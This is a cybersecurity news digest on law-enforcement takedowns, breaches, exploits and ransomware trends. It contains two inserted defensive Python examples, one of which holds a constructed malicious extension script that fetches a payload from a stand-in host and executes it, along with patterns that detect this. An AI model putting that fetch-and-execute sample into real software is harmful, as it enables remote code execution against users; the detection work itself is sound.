Operation Endgame deals a direct blow to the ransomware kill chain

Operation RapTor arrests 270 dark web vendors, 184m records exposed in an unsecured Elastic database, Local US governments breached via exploited Trimble Cityworks zero-day, Cetus Protocol exploited for $223m, FTC settles GoDaddy security failure charges, 3AM ransomware is on the rise, much more

Image source: Europol.

Important publishing notice: Metacurity will not publish on Monday, May 26, in honor of the US Memorial Day holiday. We resume publication on May 27. We salute the memory of all those who made the ultimate sacrifice in their duty to defend.



Cybercriminals around the world suffered a significant disruption after law enforcement and judicial authorities, coordinated by Europol and Eurojust in a joint effort called Operation Endgame, dealt a direct blow to the ransomware kill chain by dismantling key infrastructure behind the malware used to launch ransomware attacks, taking down 300 servers worldwide, neutralizing 650 domains, and issuing international arrest warrants against 20 targets.

Among the malware strains neutralized during the action are Bumblebee, Latrodectus, Qakbot, HijackLoader, DanaBot, Trickbot, and WarmCookie. EUR 3.5 million (around $4 million) in cryptocurrency was seized during the action week, bringing the total seized over the course of Operation Endgame to more than EUR 21.2 million (around $24 million).

In the US, the Department of Justice announced criminal charges against 16 individuals law enforcement authorities have linked to a malware operation known as DanaBot. According to a complaint, DanaBot infected at least 300,000 machines around the world. 

The charges describe the group as “Russia-based” and name two suspects, Aleksandr Stepanov and Artem Aleksandrovich Kalinkin, living in Novosibirsk, Russia. Five other suspects are named in the indictment, while another nine are identified only by pseudonyms. In addition to those charges, the Justice Department says the Defense Criminal Investigative Service (DCIS)—a criminal investigation arm of the Department of Defense—carried out seizures of DanaBot infrastructure worldwide, including in the US.

The US government also indicted Russian national Rustam Rafailevich Gallyamov, the leader of the Qakbot botnet malware operation that compromised over 700,000 computers and enabled ransomware attacks.

According to court documents, Gallyamov started to develop Qakbot (also known as Qbot and Pinkslipbot) in 2008 and deployed it to create a network of thousands of infected computers.

Over time, a team of developers was formed around Qakbot, but the indictment notes that other malware was also created under Gallyamov’s leadership.

For about a decade, Gallyamov used Qakbot as a banking trojan with worm capabilities, a malware dropper, and a backdoor that could also record keystrokes.

According to the indictment, Qakbot infections led to hundreds of ransomware victims across the globe. The list includes private companies, healthcare providers, and government agencies. (Europol, Andy Greenberg / Wired, and Ionut Ilascu / Bleeping Computer)

Related: Justice Department, CrowdStrike, Team Cymru, WeLiveSecurity, Krebs on Security, Bleeping Computer, Operation Endgame, SC Media, Proofpoint, CyberScoop, Proofpoint, GovInfoSecurity.com, Flashpoint, HealthcareInfoSecurity.com, Lumen, KDFX-TV, Department of Justice, The Register, Reuters, The Record, Lumen Blog, Tech Monitor, Bleeping Computer, GBHackers, DataBreaches.net, Cybernews, GBHackers

Europol announced that Operation RapTor, a new large-scale law enforcement operation targeting fentanyl and opioid trafficking, as well as the sale of other illicit goods and services on the dark web, resulted in 270 arrests of dark web vendors and buyers across four continents.

The operation involved government agencies from ten countries: Austria, Brazil, France, Germany, the Netherlands, South Korea, Spain, Switzerland, the UK, and the US.

The suspects were identified through coordinated investigations based on intelligence from previous takedowns of several dark web marketplaces, including Nemesis, Tor2Door, Bohemia, and Kingdom Markets.

Many had conducted thousands of sales on illicit marketplaces, using encryption tools and cryptocurrencies to cover their tracks.

Europol supported the takedown action by compiling and analysing intelligence packages based on data from the seized marketplaces.

These packages were then shared with national authorities in the Joint Cybercrime Action Taskforce framework, hosted at Europol’s headquarters, to enable targeted investigations.

The crackdown also allowed the US Treasury Department's Office of Foreign Assets Control (OFAC), working with the US Department of Justice's (DOJ) Joint Criminal Opioid and Darknet Enforcement (JCODE) team, to sanction Iranian national Behrouz Parsarad.

Parsarad is accused of being behind Nemesis Market. A federal grand jury in Ohio's Northern District handed down an indictment against Parsarad on charges related to narcotics trafficking, stemming from his dark web operations.

The US Justice Department said Operation RapTor officers also seized $184m in cash and cryptocurrencies and “a record amount of illegal drugs, firearms and drug trafficking proceeds." (Kevin Poireault / Infosecurity Magazine)

Related: Europol, Justice Department, FBI, HackRead, The Cyber Express, Teiss, Security Affairs, GBHackers

In early May, longtime data-breach hunter and security researcher Jeremiah Fowler discovered an exposed Elastic database containing 184,162,718 records across more than 47 GB of data.

However, the database didn’t include clues about who owns the data or where it may have been gathered.

The sheer range and scope of the login details, which cover an extensive array of digital services, indicate that the data is a compilation of some kind: possibly kept by researchers investigating a data breach or other cybercriminal activity, or held directly by attackers who harvested it with infostealer malware.

Each record included an ID tag for the type of account, a URL for each website or service, and usernames and plaintext passwords. Fowler notes that the password field was called “Senha,” the Portuguese word for password.

In a sample of 10,000 records analyzed by Fowler, there were 479 Facebook accounts, 475 Google accounts, 240 Instagram accounts, 227 Roblox accounts, 209 Discord accounts, and more than 100 each of Microsoft, Netflix, and PayPal accounts. That sample—just a tiny fraction of the total exposure—also included Amazon, Apple, Nintendo, Snapchat, Spotify, Twitter, WordPress, and Yahoo logins, among many others. A keyword search of the sample by Fowler returned 187 instances of the word “bank” and 57 of “wallet.”

The 10,000 sample records had 220 email addresses with .gov domains. These were linked to at least 29 countries, including the United States, Australia, Canada, China, India, Israel, New Zealand, Saudi Arabia, and the United Kingdom.

While Fowler could not identify who had put the database together or where the login details originally came from, he reported the data exposure to World Host Group, the hosting company it was linked to. Access to the database was quickly shut down. (Matt Burgess and Lily Hay Newman / Wired)

Related: Website Planet, AppleInsider, 9to5Mac, Hackread, Android Headlines, Digital Trends, iPhone in Canada, Macworld, iDrop News, PCMag, PhoneArena, BGR, MakeUseOf, r/technews

Researchers at Cisco Talos say Chinese-speaking hackers have exploited a now-patched Trimble Cityworks zero-day to breach multiple local governing bodies across the United States.

Trimble Cityworks is a Geographic Information System (GIS)-based asset management and work order management software product used primarily by local governments, utilities, and public works organizations. It is designed to help infrastructure agencies and municipalities manage public assets, handle permitting and licensing, and process work orders.

The hacking group behind this campaign (tracked as UAT-6382) used a Rust-based malware loader to deploy Cobalt Strike beacons and VShell malware designed to backdoor compromised systems and provide long-term persistent access, as well as web shells and custom malicious tools written in Chinese.

These attacks started in January 2025, when Cisco Talos observed the first signs of reconnaissance activity within the breached organizations' networks.

The security flaw exploited in these attacks (CVE-2025-0994) is a high-severity deserialization vulnerability that allows authenticated threat actors to execute code remotely on the targets' Microsoft Internet Information Services (IIS) servers.

The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-0994 to its Known Exploited Vulnerabilities (KEV) catalog on February 7. The agency ordered federal agencies to patch their systems within three weeks, as mandated by the November 2021 Binding Operational Directive (BOD) 22-01.

On February 11, CISA released an advisory warning to organizations in the water and wastewater systems, energy, transportation systems, government services and facilities, and communications sectors to "install the updated version immediately." (Sergiu Gatlan / Bleeping Computer)

Related: Cisco Talos, SC Media, Security Week

Several Sui-based tokens plunged on decentralized exchanges amid a $223 million exploit of Cetus Protocol.

Cetus claims to offer the leading DEX and liquidity infrastructure on Sui. However, its liquidity pools were drained of millions of dollars following the attack, with tokens including LOFI and HIPPO dropping over 50% within an hour, according to DEX Screener, and some tokens collapsing more than 90%.

"There was an incident detected on our protocol, and our smart contract has been paused temporarily for safety," Cetus confirmed. "The team is investigating the incident at the moment. We are grateful for your patience."

Analysts at Lookonchain claimed more than $260 million was drained from the protocol. The attacker converted the stolen funds into USDC, bridging to Ethereum, and exchanging for ETH. They estimate that around $60 million USDC has been cross-chained so far.

Blockchain security firm PeckShield said over $200 million had been stolen, repeating the $60 million bridged USDC figure.

Cetus later confirmed the amount stolen totaled roughly $223 million but claimed $162 million of the compromised funds had been successfully paused after locking its smart contract, matching the approximate $60 million remaining figure that appears to have been bridged off Sui. (James Hunt / The Block)

Related: NFT Evening, crypto.news, The Cyber Express, CryptoSlate, CoinDesk, CoinPedia

The US Federal Trade Commission (FTC) has finalized an order requiring web hosting giant GoDaddy to secure its services to settle charges of data security failures that led to several data breaches since 2018.

In January, the agency also alleged that GoDaddy, a major website hosting company with roughly five million customers, misled users about its security practices. The FTC found that GoDaddy was unaware of vulnerabilities in its hosting environment due to a lack of standard security measures.

The FTC's order prohibits the company from misleading customers about its security protections and mandates GoDaddy to establish a robust information security program, secure APIs using HTTPS or other secure transfer protocols, and set up a software and firmware update management program.

The order also requires GoDaddy to hire an independent third-party assessor to conduct biennial reviews of its information security program and report any incident where customer data was exposed, accessed, or stolen within 10 days.

Among other requirements, the hosting company has to require at least one form of mandatory MFA for all customers, employees, and contractors' staff "to any Hosting Service supporting tool or asset, including connecting to any database," offering "at least one method that does not require the customer to provide a telephone number, such as by integrating authentication applications or allowing the use of security key." (Sergiu Gatlan / Bleeping Computer)

Related: FTC, FTC, Teiss, SC Media, Compliance Week, The Business Journals

Researchers at Sophos report that a 3AM ransomware affiliate is conducting highly targeted attacks using email bombing and spoofed IT support calls to socially engineer employees into granting remote access to corporate systems.

Sophos reports at least 55 attacks leveraging this technique between November 2024 and January 2025, linked to two distinct threat clusters.

Those attacks followed the Black Basta playbook, including email bombing, vishing via Microsoft Teams, and Quick Assist abuse. The leak of Black Basta's internal conversations helped other threat actors get up to speed, as it included a template for Microsoft Teams phishing attacks impersonating IT help desks.

The 3AM ransomware attack, targeting a Sophos client, occurred in the first quarter of 2025 and used a similar approach, but with a twist: a real phone call instead of a Microsoft Teams message.

The threat actors spoofed the phone number of the target's real IT department to make the call appear legitimate. The call came during a three-minute email bombing wave in which the employee received 24 unsolicited emails.

The attacker convinced the employee to open Microsoft Quick Assist and grant remote access, supposedly to respond to the malicious activity. (Bill Toulas / Bleeping Computer)
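The sequence described above (a burst of unsolicited mail, then a Quick Assist session on the same user's machine a few minutes later) is detectable from two ordinary telemetry sources. The following is an added example, not Sophos' detection logic: it correlates a constructed mail-gateway log with constructed endpoint process-start events. The event tuple formats, user names, the 20-messages-in-3-minutes burst threshold and the 15-minute grace period are all assumptions.

```python
"""Added example (not Sophos' code): flag an email-bombing burst followed by
a Microsoft Quick Assist launch for the same user.

Assumptions: mail events are (delivered_at, recipient, sender) tuples, process
events are (started_at, user, image_name) tuples, and the thresholds below.
"""
from collections import deque
from datetime import datetime, timedelta

T0 = datetime(2025, 3, 4, 9, 0, 0)  # constructed reference time

# Constructed mail-gateway events.
MAIL_EVENTS = (
    # jdoe: 24 unsolicited messages in under three minutes (the article's scenario)
    [(T0 + timedelta(seconds=7 * i), "jdoe", f"news{i}@example.net") for i in range(24)]
    # asmith: normal volume, five messages spread over an hour
    + [(T0 + timedelta(minutes=12 * i), "asmith", "colleague@example.com") for i in range(5)]
    # bkim: bombed as well, but no follow-up "support" session
    + [(T0 + timedelta(hours=2, seconds=5 * i), "bkim", f"promo{i}@example.org") for i in range(22)]
)

# Constructed endpoint process-start events.
PROC_EVENTS = [
    (T0 + timedelta(minutes=4, seconds=10), "jdoe", "QuickAssist.exe"),  # right after the burst
    (T0 + timedelta(hours=1), "asmith", "QuickAssist.exe"),             # no burst: not alerted
    (T0 + timedelta(hours=2, minutes=1), "bkim", "outlook.exe"),        # burst, but no Quick Assist
]


def find_email_bomb_bursts(mail_events, window=timedelta(minutes=3), threshold=20):
    """Sliding-window count of inbound mail per recipient.

    Returns {recipient: [(first_ts, last_ts, message_count), ...]}.
    """
    recent = {}   # recipient -> deque of timestamps inside the window
    bursts = {}
    for ts, user, _sender in sorted(mail_events):
        q = recent.setdefault(user, deque())
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            found = bursts.setdefault(user, [])
            # Extend the burst that is still running, otherwise open a new one.
            if found and ts - found[-1][1] <= window:
                first, _last, count = found[-1]
                found[-1] = (first, ts, count + 1)
            else:
                found.append((q[0], ts, len(q)))
    return bursts


def correlate_quick_assist(bursts, proc_events, grace=timedelta(minutes=15)):
    """Alert when Quick Assist starts during a burst or within `grace` after it."""
    alerts = []
    for ts, user, image in sorted(proc_events):
        if image.lower() != "quickassist.exe":
            continue
        for first, last, count in bursts.get(user, []):
            if first <= ts <= last + grace:
                alerts.append({"user": user, "emails_in_burst": count,
                               "burst_start": first, "quick_assist_at": ts})
    return alerts


def run():
    """Stand-alone entry point over the constructed sample data."""
    return correlate_quick_assist(find_email_bomb_bursts(MAIL_EVENTS), PROC_EVENTS)


if __name__ == "__main__":
    for alert in run():
        print(f"ALERT {alert['user']}: {alert['emails_in_burst']} mails from "
              f"{alert['burst_start']:%H:%M:%S}, Quick Assist at {alert['quick_assist_at']:%H:%M:%S}")
```

Only jdoe trips the rule: bkim's burst alone is just noisy mail, and asmith's Quick Assist session alone is just a help-desk call. The point is the join on the user across the two sources, which is what turns two individually benign signals into the playbook above.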

Related: Sophos, Tripwire, Dark Reading, SC Media

OT security vendor Dragos reports that attacks on major organizations such as Unimicron, the South African Weather Service (SAWS), National Presto Industries, and Lee Enterprises signaled a surge in ransomware across critical infrastructure sectors in the first quarter of 2025, a trend that was exacerbated by a growth in the variety and sophistication of the tactics used.

"In Q1 2025, Dragos identified 708 ransomware incidents impacting industrial entities worldwide, representing an increase from approximately 600 incidents documented in Q4 2024," Dragos said. "This rise underscores the escalating frequency and complexity of ransomware operations affecting sectors such as manufacturing, transportation, industrial control systems (ICS) equipment, and engineering." (Alexander Culafi / Dark Reading)

Related: Dragos, Industrial Cyber, Food Processing AU

Regional Impact Observations, First Quarter of 2025. Source: Dragos.

White hat hacking and cybercrime investigation firm Moonlock Lab reports that cybercriminal campaigns are using fake Ledger apps to target macOS users and their digital assets by deploying malware that attempts to steal seed phrases that protect access to digital cryptocurrency wallets.

The malicious app impersonates the Ledger app to trick the user into typing their seed phrase on a phishing page.

Moonlock Lab says they have been tracking these attacks since August 2024, when the app clones could only "steal passwords, notes, and wallet details to get a glimpse of the wallet’s assets." This information would not be enough to access the funds, though.

With the recent update focusing on stealing the seed phrase, cybercriminals can empty victims' wallets. (Bill Toulas / Bleeping Computer)

Related: Moonlock Lab, Cointelegraph

Source: Moonlock Lab.

Security researchers at DomainTools discovered that a Google Chrome Web Store campaign uses over 100 malicious browser extensions that mimic legitimate tools, such as VPNs, AI assistants, and crypto utilities, to steal browser cookies and secretly execute remote scripts.

The extensions offer some of the promised functionality, but they also connect to the threat actor's infrastructure to steal user information or receive commands to execute. The malicious Chrome extensions can also modify network traffic to deliver ads, perform redirects, or proxy traffic.

DomainTools' list of over 100 malicious websites includes multiple fake VPN brands and attempts to impersonate legitimate brands, such as Fortinet, YouTube, DeepSeek AI, and Calendly.

These websites include "Add to Chrome" buttons that link to malicious browser extensions on the Chrome Web Store, thus increasing the sense of legitimacy.

Although Google removed many of the extensions DomainTools identified, some remain on the Chrome Web Store. (Bill Toulas / Bleeping Computer)
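The capabilities described above (reading every site's cookies, rewriting traffic, running code fetched from the operator's server) all show up as permission combinations in an extension's manifest, which makes a static triage pass worthwhile before anything reaches a managed browser fleet. The following is an added example and not DomainTools' tooling or their indicators: the two sample extensions, the permission heuristics and the regex for a fetch-then-execute pattern are constructed assumptions.

```python
"""Added example (not DomainTools' code): static triage of a Chrome extension's
manifest.json plus background script for the permission combinations and the
remote-code pattern the campaign above relies on. Samples are constructed."""
import json
import re

BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
TRAFFIC_PERMS = {"webRequest", "webRequestBlocking", "declarativeNetRequest",
                 "declarativeNetRequestWithHostAccess", "proxy"}
# Heuristic (assumption): a remote fetch in the same file as an execution sink.
REMOTE_FETCH = re.compile(r"\bfetch\s*\(\s*['\"]https?://")
EXEC_SINK = re.compile(r"\b(?:eval|Function)\s*\(|\.innerHTML\s*=|executeScript\s*\(")


def triage_extension(manifest_text, background_js=""):
    """Return a list of findings for one extension; an empty list is clean."""
    manifest = json.loads(manifest_text)
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    # MV2 mixes host patterns into "permissions"; MV3 moves them to "host_permissions".
    hosts = set(manifest.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
    broad = bool(hosts & BROAD_HOSTS)

    findings = []
    if "cookies" in perms and broad:
        findings.append("cookies + broad hosts: can read session cookies for every site")
    if perms & TRAFFIC_PERMS and broad:
        findings.append("traffic control + broad hosts: can redirect, inject ads or proxy traffic")
    if "scripting" in perms and broad:
        findings.append("scripting + broad hosts: can inject JS into any page")
    if REMOTE_FETCH.search(background_js) and EXEC_SINK.search(background_js):
        findings.append("remote code: background fetches a URL and feeds it to an execution sink")
    return findings


# Constructed sample 1: a fake VPN extension asking for everything it needs to
# steal cookies, rewrite traffic and run whatever its server hands back.
FAKE_VPN_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "SecureVPN Pro",                      # hypothetical name
    "permissions": ["cookies", "scripting", "declarativeNetRequest", "storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
})
FAKE_VPN_BACKGROUND = """
const res = await fetch("https://cfg.example-vpn.test/payload.js");  // hypothetical URL
const body = await res.text();
chrome.scripting.executeScript({target: {tabId}, func: new Function(body)});
"""

# Constructed sample 2: a note-taking extension with a minimal footprint.
NOTES_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Quick Notes",                        # hypothetical name
    "permissions": ["storage"],
    "action": {"default_popup": "popup.html"},
})
NOTES_BACKGROUND = 'chrome.storage.local.set({"notes": []});'

# Constructed sample 3: MV2-style manifest with the host pattern inside "permissions".
LEGACY_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Legacy Helper",                      # hypothetical name
    "permissions": ["cookies", "*://*/*"],
})


if __name__ == "__main__":
    for label, mf, bg in [("fake vpn", FAKE_VPN_MANIFEST, FAKE_VPN_BACKGROUND),
                          ("notes", NOTES_MANIFEST, NOTES_BACKGROUND),
                          ("legacy", LEGACY_MANIFEST, "")]:
        print(label, "->", triage_extension(mf, bg) or ["clean"])
```

The heuristics are deliberately coarse: a legitimate VPN or ad blocker will also request traffic-control permissions with broad host access, so the output is a review queue, not a verdict. What it catches reliably is the combination the article describes, broad host access together with cookie access and a background script that pulls code from a remote origin.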

Related: Domain Tools, DomainTools on GitHub, SC Media

Malicious site impersonating Fortinet VPN client Source: DomainTools.

Researchers at Sophos report that the ransomware gang DragonForce is fighting a “turf war” with rival ransomware operators to assert its dominance in the cybercrime marketplace.

The group appears responsible for RansomHub's infrastructure outage in late March 2025, which contributed to a significant fall in ransomware attacks in April; the outage may have resulted from an attempted "hostile takeover" of RansomHub by DragonForce.

The researchers observed that DragonForce’s attacks on ransomware-as-a-service (RaaS) rivals began after it rebranded as a ‘cartel’ in March 2025 to expand its reach.

Sophos researchers observed that the cartel announcement in March coincided with defacements of leak sites operated by the BlackLock and Mamona ransomware groups. The defacements show DragonForce’s logo. (James Coker / Infosecurity Magazine)

Related: Sophos

Advertisement for the DragonForce cartel. Source: Sophos.

Best Thing of the Day: Finding Vets Jobs in Cybersecurity

Given how well-suited military personnel are to cybersecurity work, one UK charity organization, TechVets, is finding many jobs for veterans every month in the cyber sector.

Bonus Best Thing of the Day: Building AI Secure at the Outset

CISA, the National Security Agency, the Federal Bureau of Investigation, and international partners released guidance on key risks arising from data security and integrity issues across all phases of the AI lifecycle, from development and testing to deployment and operation.

Worst Thing of the Day: Let's Make Commercial Spying Even More Lucrative

The Office of the Director of National Intelligence is developing a system to centralize and “streamline” the use of commercially available information (CAI) by American spy agencies, such as location data derived from mobile ads.

Bonus Worst Thing of the Day: Get Used to China Spying on Everything

US officials warn that telecoms may never be able to purge Salt Typhoon from their networks fully.

Extra Bonus Worst Thing of the Day: Killing US Cybersecurity Conferences to Make America Great Again

Hackers On Planet Earth (HOPE), the iconic and long-running hacking conference, says far fewer people have bought tickets for the event this year than last due to Trump's mass deportation efforts and aggressive detainment of travelers.
